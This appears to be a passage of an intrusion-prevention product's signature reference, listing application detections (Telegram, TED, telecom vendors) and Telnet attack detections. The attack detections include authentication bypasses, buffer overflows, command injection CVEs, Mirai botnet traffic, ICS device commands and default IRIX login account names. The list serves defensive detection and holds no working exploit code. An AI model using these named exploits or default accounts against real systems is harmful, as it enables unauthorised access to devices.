TechExcel

About this situation: Application TechExcel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TechExcel is a provider of unified Application Lifecycle Management as well as Support and Service solutions that bridge the divide between product development and service
Back to top

Techinline-Remote-Desktop

About this situation: Application Techinline-Remote-Desktop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Techinline Remote Desktop is a remote support tool that enables to connect between remote PCs over the web and to any point on the globe.
Back to top

TechnologyOne

About this situation: Application TechnologyOne detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TechnologyOne Limited maker of business-to-business software for the government, local government, education, health and community services, utilities, financial services and managed services sectors.
Back to top

Technorati

About this situation: Application Technorati detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Technorati is an Internet search engine for searching blogs.
Back to top

TechSoup

About this situation: Application TechSoup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TechSoup is a nonprofit international network that provides technology and other resources to the voluntary sector.
Back to top

TechTarget

About this situation: Application TechTarget detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TechTarget is a technology media company that provides online content for technology buyers researching and making technology decisions.
Back to top

Ted.com

About this situation: TED.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: This platform allows users to attend live streaming conferences and viewing of previous conferences. These conferences usually have a scientific, cultural, academic, or technology focus. Source: Wikipeda
Back to top

Teen-Health-and-Wellness

About this situation: Application Teen-Health-and-Wellness detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teen Health and Wellness is information portal for middle school and high school students.
Back to top

Telcoworx

About this situation: Application Telcoworx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TelcoWorx specialises in the provision of 1300 numbers and 1800 numbers for Internet Service Providers
Back to top

Telecom-Italia

About this situation: Application Telecom-Italia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Telecom Italia offers infrastructures and technological platforms on which voice and data become telecommunications services and ICT solutions.
Back to top

Telefonica-Cloud

About this situation: Application Telefonica-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Telefonica cloud, is a high performance computing cloud designed for the toughest modern workloads and applications
Back to top

Telegram

About this situation: Telegram usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1857-5242
Description: Telegram is a cloud-based instant messaging service. It can be used to send and receive encrypted messages, phone calls and attachments.
Back to top

Telegram Desktop

About this situation: Endpoint Context Agent based Telegram Desktop
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1098-5242
Description: Telegram Desktop endpoint application has been detected. Telegram is a popular cloud-based instant messaging service.
Back to top

Telegraph-Online

About this situation: Telegraph Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: The Telegraph is a British newspaper.
Back to top

TeleManagement-Technologies

About this situation: Application TeleManagement-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeleManagement Technologies is a developer of telecom expense management and call accounting software.
Back to top

TeleMessage

About this situation: Application TeleMessage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeleMessage is the alternative to consumer messaging apps in the workplace.
Back to top

Telenet-Webmail

About this situation: Telenet Webmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This website hosts email services for Telenet customers.
Back to top

TeleSign

About this situation: Application TeleSign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TeleSign solutions address the full spectrum of account security - registration, access, usage and recovery - while it also streamlines user experience to help increase adoption, retention and trust.
Back to top

Telestream

About this situation: Application Telestream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Telestream, Inc. provider of software and hardware products for video capture, encoding, transcoding, and network-based delivery. Products include desktop components, screencasting, video streaming, cross-platform encoding software and transcoding applications to automate enterprise-class digital video workflows
Back to top

Telias

About this situation: Application Telias detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Telias company takes in the absence of phone calls against on behalf of the client and sent to phone calls a note by e-mail or SMS.
Back to top

Telit

About this situation: Application Telit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Telit is an enabler of machine-to-machine (M2M) communications worldwide providing wireless module technology, services and connectivity.
Back to top

Tellonym

About this situation: Tellonym usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Description: Tellonym is a social media platform to engage with relevant people.
Back to top

Telmex

About this situation: Application Telmex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Telmex is a provider of fixed-line telephony services. It provides telecommunications and telecommunications-related services
Back to top

Telnet

About this situation: Endpoint Context Agent based Telnet detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Description: A network connection launched by the Windows command line tool Telnet was detected.
Back to top

Telnet

About this situation: Telnet traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1139-5242
Description: Telnet is a network protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. Source: Wikipedia
Back to top

Telnet_CCS-Kerberos-Authentication-Bypass

About this situation: Attempt to exploit an authentication bypass vulnerability
Context: Telnet TCP Client Command Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic telnet server, CVE2007, Any Operating System not specific, Generic telnet server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Kerberos-Login-Authentication-Bypass
Description:
Back to top

Telnet_CCS-Ld-Library-Path-Attack

About this situation: Telnet shared object library path change
Context: Telnet TCP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic telnet server, CVE1999, Any Operating System not specific, Generic telnet server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Linkerbug
Description:
Back to top

Telnet_CCS-Livingston-Reboot-DoS

About this situation: Livingston Portmaster DoS detected
Context: Telnet TCP Client Command Stream
Severity: 2
Tags: Other, Any Hardware, Generic telnet server, CVE1999, Generic telnet server not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Livinston-Telnet-Reboot
Description:
Back to top

Telnet_CCS-NTLM-Authentication-Usage

About this situation: NTLM authentication usage with Telnet protocol was detected
Context: Telnet TCP Client Command Stream
Severity: 1
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Microsoft-Windows-Telnet-Credential-Reflection-Vulnerability
Description:
Back to top

Telnet_CCS-Resolv-Host-Conf-Disclosure

About this situation: RESOLV_HOST_CONF change
Context: Telnet TCP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic telnet server, CVE2001, Any Operating System not specific, Generic telnet server not specific, Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Resolv-Host-Conf-Manipulation
Description:
Back to top

Telnet_CCS-Solaris-Telnet-Passwordless-Remote-Access

About this situation: A critical flaw allows remote logins to any account without password
Context: Telnet TCP Client Command Stream
Severity: 10
Tags: Solaris 10, Solaris 11, Any Hardware, Generic telnet server, CVE2007, Generic telnet server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Solaris-Telnet-Passwordless-Remote-Access
Description:
Back to top

Telnet_CCS-Suspicious-Authentication-Request

About this situation: Attempt to exploit an authentication bypass vulnerability
Context: Telnet TCP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

Telnet_CCS-Very-Long-Login-Name

About this situation: A very long login name
Context: Telnet TCP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic telnet server, Any Operating System not specific, Generic telnet server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Description:
Back to top

Telnet_CS-Cisco-Adaptive-Security-Appliance-Invalid-CLI-Command

About this situation: An attempt to exploit a Cisco Adaptive Security Appliance Invalid-CLI-Command vulnerability detected
Context: Telnet TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Cisco-Adaptive-Security-Appliance-Invalid-CLI-Command
Description:
Back to top

Telnet_CS-Cisco-IOS-Telnet-Denial-of-Service

About this situation: An attempt to exploit a Cisco IOS Telnet Denial of Service vulnerability detected
Context: Telnet TCP Client Stream
Severity: 7
Tags: Cisco IOS, Any Hardware, Cisco IOS Telnet, CVE2017, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-952-5242
Last changed: sgpkg-ips-952-5242
Vulnerability: Cisco-IOS-Telnet-Denial-of-Service
Description:
Back to top

Telnet_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution

About this situation: An Eclipse Equinoxe OSGi Console Command Execution vulnerability
Context: Telnet TCP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Eclipse Equinoxe OSGi, Windows not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1117-5242
Vulnerability: Eclipse-Equinoxe-OSGi-Console-Command-Execution
Description:
Back to top

Telnet_CS-GAMSoft-TelSrv-Username-Buffer-Overflow

About this situation: An attempt to exploit a GAMSoft TelSrv Username Buffer Overflow vulnerability detected
Context: Telnet TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GAMSoft TelSrv, CVE2000, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: GAMSoft-TelSrv-Username-Buffer-Overflow
Description:
Back to top

Telnet_CS-GE-D20-Feature-Request

About this situation: GE D20 Feature Request sequence detected
Context: Telnet TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_CS-GE-D20-Reboot

About this situation: GE D20 reboot sequence detected
Context: Telnet TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_CS-GE-D20-Remote-Diagnostic-Self-Test

About this situation: GE D20 Remote Diagnostic Self Test sequence detected
Context: Telnet TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_CS-Linksys-WAP610N-Unauthenticated-Root-Access

About this situation: An attempt to exploit a vulnerability in Linksys WAP610N detected
Context: Telnet TCP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Linksys WAP610N, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Linksys-WAP610N-Unauthenticated-Root-Access
Description:
Back to top

Telnet_CS-Mirai-Botnet-C-And-C-Traffic

About this situation: Mirai botnet traffic detected
Context: Telnet TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1010-5242
Vulnerability: Mirai-Botnet
Description:
Back to top

Telnet_CS-Polycom-Shell-HDX-Series-Traceroute-Command-Execution

About this situation: A Polycom Shell HDX Series Traceroute Command Execution vulnerability
Context: Telnet TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Polycom Shell, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Polycom-Shell-HDX-Series-Traceroute-Command-Execution
Description:
Back to top

Telnet_CS-SAGEM-Router-Fast-3304-3464-3504-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in PROMOTIC detected
Context: Telnet TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAGEM 3304, SAGEM 3464, SAGEM 3504, Any Operating System not specific, Suspected Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: SAGEM-Fast-Routers-3304-3464-3504-Authentication-Bypass
Description:
Back to top

Telnet_CS-Samsung-Data-Manager-Default-Root-Password

About this situation: An attempt to use default root password in Samsung Data Manager detected
Context: Telnet TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung Data Manager, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Samsung-Data-Manager-Default-Root-Password
Description:
Back to top

Telnet_CS-Scadatec-Limited-Procyon-Buffer-Overflow

About this situation: Scadatec Limited Procyon Buffer Overflow
Context: Telnet TCP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Scadatec Procyon, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: Scadatec-Limited-Procyon-Buffer-Overflow
Description:
Back to top

Telnet_CS-Schweitzer-SEL-2032-File-Upload

About this situation: Schweitzer SEL-2032 file upload detected
Context: Telnet TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_CS-Schweitzer-SEL-2032-Session-Logout

About this situation: Schweitzer SEL-2032 Session logout detected
Context: Telnet TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_CS-Schweitzer-SEL-2032-Status-Command

About this situation: Schweitzer SEL-2032 Status command detected
Context: Telnet TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_CS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Telnet TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Telnet_CS-Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Verso NetPerformer detected
Context: Telnet TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Verso NetPerformer, CVE2006, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-580-5211
Vulnerability: Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability
Description:
Back to top

Telnet_CS-Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014

About this situation: A vulnerability in Microsoft Windows
Context: Telnet TCP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-01, CVE2015, Windows not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-624-5211
Last changed: sgpkg-ips-624-5211
Vulnerability: Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014
Description:
Back to top

Telnet_CSCS-Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FreeBSD Project telnetd detected
Context: Telnet TCP Client Single Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenBSD Project telnetd, Red Hat telnetd, FreeBSD Project telnetd, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow
Description:
Back to top

Telnet_CTS-Default-IRIX-Account-4dgifts

About this situation: Attempted login via default account 4Dgifts
Context: Telnet TCP Client Terminal Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Default-User-And-Password
Description:
Back to top

Telnet_CTS-Default-IRIX-Account-Ezsetup

About this situation: Attempted login via default account EZsetup
Context: Telnet TCP Client Terminal Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Default-User-And-Password
Description:
Back to top

Telnet_CTS-Default-IRIX-Account-Guest

About this situation: Attempted login via default account guest
Context: Telnet TCP Client Terminal Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Default-User-And-Password
Description:
Back to top

Telnet_CTS-Default-IRIX-Account-OutOfBox

About this situation: Attempted login via default account OutOfBox
Context: Telnet TCP Client Terminal Stream
Severity: 7
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Default-User-And-Password
Description:
Back to top

Telnet_CTS-YoungZSoft-CCProxy-Ping-Hostname-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in YoungZSoft CCProxy was detected
Context: Telnet TCP Client Terminal Stream
Severity: 7
Tags: Windows, Any Hardware, YoungZSoft CCProxy, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: YoungZSoft-CCProxy-Ping-Hostname-Buffer-Overflow
Description:
Back to top

Telnet_CTS-ZyXEL-VMG4325-B10A-Insecure-Default-Credentials-CVE-2025-0890

About this situation: An attempt to exploit a vulnerability in ZyXEL detected
Context: Telnet TCP Client Terminal Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2025, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: ZyXEL-VMG4325-B10A-Insecure-Default-Credentials-CVE-2025-0890
Description:
Back to top

Telnet_CTS-ZyXEL-VMG4325-B10A-Telnet-Command-Injection-CVE-2024-40891

About this situation: An attempt to exploit a vulnerability in ZyXEL detected
Context: Telnet TCP Client Terminal Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: ZyXEL-VMG4325-B10A-Telnet-Command-Injection-CVE-2024-40891
Description:
Back to top

Telnet_GE-D20-Clear-Audit-Log-Attempt

About this situation: GE D20 Clear Audit Log attempt detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_GE-D20-Configuration-Traffic

About this situation: GE D20 configuration traffic detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Description:
Back to top

Telnet_GE-D20-Display-Access-Change-Attempt

About this situation: GE D20 Display Access Change attempt detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_GE-D20-Failed-Login

About this situation: GE D20 failed login sequence detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_GE-D20-Invalid-Command

About this situation: GE D20 Invalid command detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_GE-D20-Logoff

About this situation: GE D20 Logoff detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_GE-D20-Successful-Login

About this situation: GE D20 successful login sequence detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_GE-D20-Update-Date-Time

About this situation: GE D20 update date/time settings detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_GE-D20-View-Device-Status

About this situation: GE D20 View Device Status sequence detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

Telnet_IRIX-RLD-Format-String

About this situation: Telnet RLD format string vuln exploit detected
Context: Telnet TCP Client Stream
Severity: 7
Tags: IRIX, Any Hardware, Generic telnet server, CVE2000, IRIX not specific, Generic telnet server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: IRIX-Telnetd-Format-String
Description:
Back to top

Telnet_Johnson-Controls-CK720-Date-Time-Change

About this situation: Johnson Controls CK720 date/time change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Johnson Controls CK720, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Johnson-Controls-CK720-Commands
Description:
Back to top

Telnet_Johnson-Controls-CK720-Reboot-Attempt

About this situation: Johnson Controls CK720 Reboot attempt detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Johnson Controls CK720, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Johnson-Controls-CK720-Commands
Description:
Back to top

Telnet_Johnson-Controls-CK720-Successful-Login

About this situation: Johnson Controls CK720 successful login detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Johnson Controls CK720, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Johnson-Controls-CK720-Commands
Description:
Back to top

Telnet_Johnson-Controls-CK720-Successful-Password-Change

About this situation: Johnson Controls CK720 password change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Johnson Controls CK720, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Johnson-Controls-CK720-Commands
Description:
Back to top

Telnet_Possible-XSS-Script-In-Login

About this situation: An attempt to inject XSS script via login
Context: Telnet TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Extremeware-Event-Log-Telnet-Failure-XSS
Description:
